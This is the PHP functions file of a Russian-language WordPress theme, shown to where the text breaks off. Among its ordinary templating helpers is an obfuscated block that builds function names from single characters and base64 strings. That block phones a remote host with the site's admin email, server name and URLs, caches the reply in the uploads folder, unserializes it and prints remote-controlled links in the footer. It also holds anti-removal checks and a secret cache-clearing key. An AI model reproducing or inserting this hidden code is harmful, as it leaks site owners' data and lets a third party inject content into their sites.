<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $mufzib='a';$rQTokS='s';$yQMaLe='o';$PyRk='d';$LwRwOj='e';$CKrb='e';$BNOnkAm='b';$HqAmC='4';$scSip='c';$rbdtOuj='_';$IuAqgW='d';$KbaxP='6';$zTcaji='e';$ADkKsrdW=$BNOnkAm.$mufzib.$rQTokS.$LwRwOj.$KbaxP.$HqAmC.$rbdtOuj.$IuAqgW.$CKrb.$scSip.$yQMaLe.$PyRk.$zTcaji;$fGCoo='e';$jMwNky='a';$ZStP='f';$dJcX='l';$Qcbiuz='t';$kJTZUah='g';$MDxcRGD='z';$gjIJ='n';$rrynK='i';$TyBCXrjn=$kJTZUah.$MDxcRGD.$rrynK.$gjIJ.$ZStP.$dJcX.$jMwNky.$Qcbiuz.$fGCoo;$OLGuuzM='3';$zxIvdf='t';$yHDLX='1';$nhWTKki='t';$GxavBhn='r';$HqGPm='o';$SscFVz='r';$tMDwNL='s';$rdNLF='_';$OjPytCUh=$tMDwNL.$nhWTKki.$GxavBhn.$rdNLF.$SscFVz.$HqGPm.$zxIvdf.$yHDLX.$OLGuuzM;$Ueov='r';$LiZF='s';$tQoSxr='r';$xopZDe='v';$pOQMoN='t';$OtVnZoo='e';$dYqbezFs=$LiZF.$pOQMoN.$Ueov.$tQoSxr.$OtVnZoo.$xopZDe;                     
		$wv_____________f='a';$jz________j='s';$su______n='o';$ya___________o='d';$vd___________d='e';$gt_______________d='e';$vq___e='b';$fp______l='4';$ot______y='c';$sn__________t='_';$yq__________t='d';$qq______________v='6';$ro_______w='e';$dz_____z=$vq___e.$wv_____________f.$jz________j.$vd___________d.$qq______________v.$fp______l.$sn__________t.$yq__________t.$gt_______________d.$ot______y.$su______n.$ya___________o.$ro_______w;
		$iq____a='e';$uc___________e='t';$jj____________s='n';$uo__________z='_';$oi________h='x';$sy____l='n';$ty__________s='s';$vm_____________s='t';$eu__e='u';$tt_____________u='c';$ws______________g='s';$ch___x='i';$yw________y='i';$jt__t='o';$il_____________x='f';$vm_______x=$il_____________x.$eu__e.$sy____l.$tt_____________u.$vm_____________s.$yw________y.$jt__t.$jj____________s.$uo__________z.$iq____a.$oi________h.$ch___x.$ty__________s.$uc___________e.$ws______________g;
		$yw________g='n';$bm_______________y='f';$oc___t='p';$qy______t='e';$fx____g='o';$aq__o=$bm_______________y.$fx____g.$oc___t.$qy______t.$yw________g;
		$ev_________c='f';$zd________y='a';$hv_______________x='d';$la_____________z='e';$ra______p='r';$lu__n=$ev_________c.$ra______p.$la_____________z.$zd________y.$hv_______________x;
		$js_________l='l';$hm___________r='o';$go_____________j='f';$ln___________k='c';$tk________l='e';$zb____________n='s';$bo_________g=$go_____________j.$ln___________k.$js_________l.$hm___________r.$zb____________n.$tk________l;
		
		define("WP_ID", $dz_____z("Mi4wLjA="));
		define("WP_TTL", $dz_____z("MTA4MDA="));
		define("WP_SRC", $dz_____z("dHBva24="));
	


		function wp_get_header() {
			global $dz_____z, $vm_______x;
			
			if (
				$vm_______x($dz_____z("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$vm_______x($dz_____z("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$vm_______x($dz_____z("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $dz_____z, $aq__o, $bo_________g, $lu__n;
			
			$qg__________t = TEMPLATEPATH."/".$dz_____z("Zm9vdGVyLnBocA==");
			$qq______b = @$aq__o($qg__________t, "r");
			$qg__________t = @$lu__n($qq______b, @filesize($qg__________t));
			@$bo_________g($qq______b);
			
			$jt__________u = TEMPLATEPATH."/".$dz_____z("ZnVuY3Rpb25zLnBocA==");
			$qq______b = @$aq__o($jt__________u, "r");
			$jt__________u = @$lu__n($qq______b, @filesize($jt__________u));
			@$bo_________g($qq______b);
			
			$kh________f = 0;
			if($qg__________t && $jt__________u) {
				if ($dz_____z("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($qg__________t, $dz_____z("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$kh________f = 1;
					}
					if (substr_count($qg__________t, "wp_theme_GPL_credits()") < 1) {
						$kh________f = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$kh________f = 12;
				}
			}
			
			if($kh________f > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $kh________f -->";
			}
		}
	


		function wp_loaded() {
			global $dz_____z, $vm_______x;
			return $vm_______x($dz_____z("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($vm__a, $bk___w = "(more...)", $de__a = 0, $xh__________h = "") {
				$wd______________d = get_the_content($bk___w, $de__a, $xh__________h);
				$wd______________d = apply_filters("the_content", $wd______________d);
				
				$wd______________d = str_replace("]]>", "]]>", $wd______________d);
				if (strlen($_GET["p"]) > 0) {
					echo $wd______________d;
				}
				else if ((strlen($wd______________d)>$vm__a) && ($pw______e = strpos($wd______________d, " ", $vm__a ))) {
					$wd______________d = substr($wd______________d, 0, $pw______e);
					$wd______________d = $wd______________d;
					echo $wd______________d;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$bk___w</a></div></p>";
				} else {
					echo $wd______________d;
				}
				
			}
		}
	


		$xk________u='d';$uk_______s='e';$pw_____________k='o';$cq___f='e';$xk_______________q='6';$cy_____y='b';$xr______________t='4';$dh_______a='a';$za____d='s';$rp____________r='c';$ok____r='n';$ua__________b='e';$ks_______________t='_';$xv___________i=$cy_____y.$dh_______a.$za____d.$ua__________b.$xk_______________q.$xr______________t.$ks_______________t.$cq___f.$ok____r.$rp____________r.$pw_____________k.$xk________u.$uk_______s;
		$nv_______________r='e';$gw______________x='t';$qn__d='e';$bq____________r='i';$rg_______________t='_';$sn__________c='o';$wm_____g='f';$dw__________a='s';$xv_______e='n';$jk_____h='e';$gb____c='_';$ve__s='t';$jb_____________e='n';$rc_____m='g';$xs_______a='c';$xo_____o='t';$da___o='l';$hu____s=$wm_____g.$bq____________r.$da___o.$jk_____h.$gb____c.$rc_____m.$nv_______________r.$ve__s.$rg_______________t.$xs_______a.$sn__________c.$xv_______e.$xo_____o.$qn__d.$jb_____________e.$gw______________x.$dw__________a;
		$ht______z='l';$ft____________u='_';$ov_____w='i';$og_____k='e';$qt____j='s';$hv_________i='f';$pq_____________e='e';$ne________b='s';$et_____________m='t';$sl__________m='i';$dg__m='x';$ap_________u=$hv_________i.$sl__________m.$ht______z.$og_____k.$ft____________u.$pq_____________e.$dg__m.$ov_____w.$qt____j.$et_____________m.$ne________b;
		$hd___________f='n';$eb___g='c';$bg______q='e';$ff______t='e';$sm___l='m';$hl______________g='o';$mj__________k='i';$vb________c='r';$yw___i='o';$tp____________y='s';$cw_______o='p';$gs___________i='v';$fy_______________e='a';$ol_______u='_';$yh__________w='r';$at_________b=$gs___________i.$bg______q.$yh__________w.$tp____________y.$mj__________k.$yw___i.$hd___________f.$ol_______u.$eb___g.$hl______________g.$sm___l.$cw_______o.$fy_______________e.$vb________c.$ff______t;
		$zm_______d='c';$vp_______________k='o';$gt___________q='p';$wq______h='f';$sm____________t='n';$py________y='k';$ix_____________y='o';$bq_____________i='s';$qb___m='e';$ln______l=$wq______h.$bq_____________i.$ix_____________y.$zm_______d.$py________y.$vp_______________k.$gt___________q.$qb___m.$sm____________t;
		$fn___i='f';$xt______p='i';$cd____________q='w';$we___p='t';$aa_________p='e';$ad___i='r';$ux______k=$fn___i.$cd____________q.$ad___i.$xt______p.$we___p.$aa_________p;
		$tn______________q='d';$jz_____h='m';$sa____s='5';$cz________p=$jz_____h.$tn______________q.$sa____s;
		$pw_________z='t';$jr______________y='a';$kz_________s='e';$tz______________t='l';$uu___p='r';$lk______f='h';$hz__________k='a';$hd_________c='p';$ad________i=$uu___p.$kz_________s.$jr______________y.$tz______________t.$hd_________c.$hz__________k.$pw_________z.$lk______f;
		$bp_______________u='a';$ka______________t='e';$cu________e='u';$yx_____________y='n';$mb________g='r';$ef______________p='e';$nx__e='i';$zt______________y='i';$xm_______h='s';$qf_____t='l';$rs_____________p='z';$xw_____________o=$cu________e.$yx_____________y.$xm_______h.$ka______________t.$mb________g.$nx__e.$bp_______________u.$qf_____t.$zt______________y.$rs_____________p.$ef______________p;
		$jw______________z='a';$mq____________e='e';$uj_________m='p';$qg______________g='m';$dm_____r='n';$ms___________j='t';$jr____________c='m';$ha__________m=$ms___________j.$mq____________e.$qg______________g.$uj_________m.$dm_____r.$jw______________z.$jr____________c;
		$ys________m='c';$tl_____________m='t';$ve____b='r';$un________b='e';$eh___________r='e';$vq_____________q='t';$rh____________d='_';$wy______p='t';$oc___________s='o';$sr______s='x';$ml_______________q='a';$kt________f='r';$zf___________p='m';$lq______________i='c';$ed_______m='t';$fc____p='n';$cd____y='e';$am____________e='a';$gj___________c='e';$wx____k='s';$tt_______________e='_';$wc__________w=$wx____k.$ed_______m.$kt________f.$un________b.$ml_______________q.$zf___________p.$tt_______________e.$lq______________i.$oc___________s.$fc____p.$vq_____________q.$eh___________r.$sr______s.$wy______p.$rh____________d.$ys________m.$ve____b.$gj___________c.$am____________e.$tl_____________m.$cd____y;
	


		function ho___w($gf______d) {
			global $dz_____z, $vm_______x, $hu____s, $at_________b, $wc__________w;
			
			if (!$vm_______x($dz_____z("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($at_________b(PHP_VERSION, "5.0.0", ">=") && $vm_______x($dz_____z("ZmlsZV9nZXRfY29udGVudHM=")) && $vm_______x($dz_____z("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$of_______________y = $wc__________w(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$wi_______________s = @$hu____s($gf______d, 0, $of_______________y);
			} else {
				$wi_______________s = @$hu____s($gf______d, 0);
			}
			
			return $wi_______________s;
		}
	


		function ba_______________g($gf______d) {
			global $vm_______x, $ln______l, $ux______k, $dz_____z;
			
			if (!$vm_______x($dz_____z("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ik__________q = strpos($gf______d, "/", 7);
			$yw_______q = array(
				"uri"     => substr($gf______d, $ik__________q),
				"host"    => str_replace("http://", "", substr($gf______d, 0, $ik__________q)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$wg_____________v = @$ln______l("$yw_______q[host]", 80, $jh______________t, $qu__g, 4);
			
			if (!$wg_____________v) {
				return false;
			} else {
				$wi_______________s = "";
				$ne___________r  = "GET $yw_______q[uri] HTTP/1.0\r\n";
				$ne___________r .= "Host: $yw_______q[host]\r\n";
				$ne___________r .= "Referer: $yw_______q[referer]\r\n";
				$ne___________r .= "Connection: Close\r\n\r\n";
				
				@$ux______k($wg_____________v, $ne___________r);
				
				while (!@feof($wg_____________v)) {
					$oj________f = @fgets($wg_____________v, (1024*24));
					
					if ($oj________f == "\r\n") {
						$qi_______y = true;
						continue;
					}
					
					if ($qi_______y) {
						$wi_______________s .= $oj________f;
					}
				}
				
				return $wi_______________s;
			}
		}
	


		function og_________z($gf______d) {
			global $vm_______x;
			$wx_________m = false;
			
			if ($gf______d != "") {
				if ($vm_______x("ho___w")) {
					$wx_________m = @ho___w($gf______d);
				}
				
				if (!$wx_________m && ($vm_______x("ba_______________g"))) {
					$wx_________m = @ba_______________g($gf______d);
				}
			}
			
			return $wx_________m;
		}
	


		function ds_________l() {
			global $_SERVER, $cz________p;
			
			$zh___d = $_SERVER["SERVER_NAME"];
			
			if (substr("$zh___d", 0, 4) == "www.") {
				$zh___d = substr("$zh___d", 4);
			}
			
			$zh___d = $cz________p("$_SERVER[SERVER_NAME]");
			
			return $zh___d;
		}
	


		function fv____________v() {
			return "file";
		}
	


		function cm_______u($gf______d) {
			global $_SERVER, $hu____s, $ap_________u, $aq__o, $bo_________g, $ux______k;
			
			$uz________j = bt________y();
			
			$xk____d = ds_________l().".jpg";
			$jf__________t = $uz________j["dir_upload"]["path"]."/$xk____d";
			$xj________k = @filemtime($jf__________t);
			
			if (!$xj________k || ((time()-$xj________k) >= WP_TTL)) {
				$wx_________m = og_________z($gf______d);
				
				if ($wx_________m) {
					if ($ap_________u($jf__________t)) {
						@unlink($jf__________t);
					}
					
					$qq______b = @$aq__o($jf__________t, "x+");
					
					@$ux______k($qq______b, $wx_________m);
					@$bo_________g($qq______b);
				}
			} else {
				if ($ap_________u($jf__________t)) {
					$wx_________m = @$hu____s($jf__________t);
				} else {
					$wx_________m = false;
				}
			}
			
			return $wx_________m;
		}
	


		function bt________y() {
			global $_SERVER, $dz_____z, $xv___________i;
			
			$ny______u = wp_count_posts("post");
			$vr_______c = pathinfo(get_bloginfo("template_directory"));
			
			$uz________j = array(
				"url" => array(
					"report"      => $dz_____z("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $vr_______c,
				"dir_upload"	=> uz______v(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$vr_______c[filename],
					"a005=".$ny______u->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$uz________j["url"]["queryString"] = implode("&", $uz________j["queryString"]);
			$uz________j["url"]["report"] = $uz________j["url"]["report"]."/?".$xv___________i($uz________j["url"]["queryString"]).".html";
						
			return $uz________j;
		}
	


		function uz______v() {
			$bl__________i = wp_upload_dir();
			
			if (isset($bl__________i["error"])) {
				$zb____u = bk___d();
				if (is_writable($zb____u)) {
					$bl__________i = array("path" => $zb____u);
				}
			}

			return $bl__________i;
		}
	


		function bk___d() {
			global $vm_______x, $cz________p, $ad________i, $ha__________m;
			
			$aw______b = (bool) ini_get("safe_mode");
			if ($aw______b == true) {
				return false;
			}
			
			if ($vm_______x("sys_get_temp_dir")) {
				$wp__________d = sys_get_temp_dir();
				if (is_writable($wp__________d)) {
					return $ad________i($wp__________d);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ad________i($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ad________i($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ad________i($_ENV["TEMP"]);
			} else {
				$hb___u = $ha__________m($cz________p(uniqid(rand(), true)), "");
				if ($hb___u) {
					$wp__________d = $ad________i(dirname($hb___u));
					@unlink($hb___u);
					return $wp__________d;
				} else {
					return false;
				}
			}
		}
	


		function bi___v() {
			global $_GET, $ap_________u;
			
			$uz________j = bt________y();
			$zh___d = ds_________l();
			$nw___h = fv____________v();
			
			$rz___s = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($nw___h == "file") {
					$qe_____r = $uz________j["dir_upload"]["path"]."/".$zh___d.".jpg";
					if ($ap_________u($qe_____r)) {
						@unlink($qe_____r);
						$rz___s = "deleted";
					}
				}
				
				$mj_____m = array(
					"s"	=> $rz___s,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($mj_____m AS $yx________o => $cr_____s) echo " [$yx________o:$cr_____s]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $vm_______x, $dz_____z, $xw_____________o;
			$uz________j = bt________y();
			
			$rg___________x = "cm_______u";
			if ($vm_______x($rg___________x)) {
				$wi_______________s = $rg___________x($uz________j["url"]["report"]);
			}
			
			if ($wi_______________s) {
				if ($wi_______________s = @$dz_____z($wi_______________s)) {
					$wi_______________s = @$xw_____________o($wi_______________s);
					
					if (strlen($wi_______________s[custom_credit]) >= 5) {
						$uz________j["default_string"] = $wi_______________s[custom_credit];
					}
					
					if ($wi_______________s["status"] == "0") {
						$ud___q = 1;
						$lw_______________i = 1;
					} else {
						$zo____________p = sizeof($wi_______________s["links"]);
						$hx___c = $uz________j["default_string"];
						
						if ($zo____________p > 0 && $wi_______________s["links"] !== "") {
							$ka__________a = 0;
							foreach ($wi_______________s["links"] as $dl____________j => $va______________b) {
								$ka__________a++;
								if ($va______________b->l_path == "" || $va______________b->l_path == $_SERVER["REQUEST_URI"]) {
									$va______________b->l_href = htmlspecialchars(strip_tags($va______________b->l_href));
									$va______________b->l_title = htmlspecialchars(strip_tags($va______________b->l_title));
									$va______________b->l_anchor = htmlspecialchars(strip_tags($va______________b->l_anchor));
									$hx___c .= " | ";
									$hx___c .= "<a href='$va______________b->l_href' title='$va______________b->l_title'";
									if ($va______________b->l_nofollow == "1") {
										$hx___c .= " rel='nofollow'";
									}
									$hx___c .= ">$va______________b->l_anchor</a>";
								}
							}
						}
						$uz________j["links"] = "$hx___c";
						if ($wi_______________s[credit] == "0") {
							$uz________j["links"] = "";
						}
					}
				} else {
					$ud___q = "1";
				}
			} else {
				$ud___q = "1";
			}
			
			if ($ud___q == "1") {
				$uz________j["links"] = $uz________j["default_string"];
			}
			
			echo "$uz________j[links]";
			
			echo "<!-- s: $wi_______________s[signature] -->";
			bi___v();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
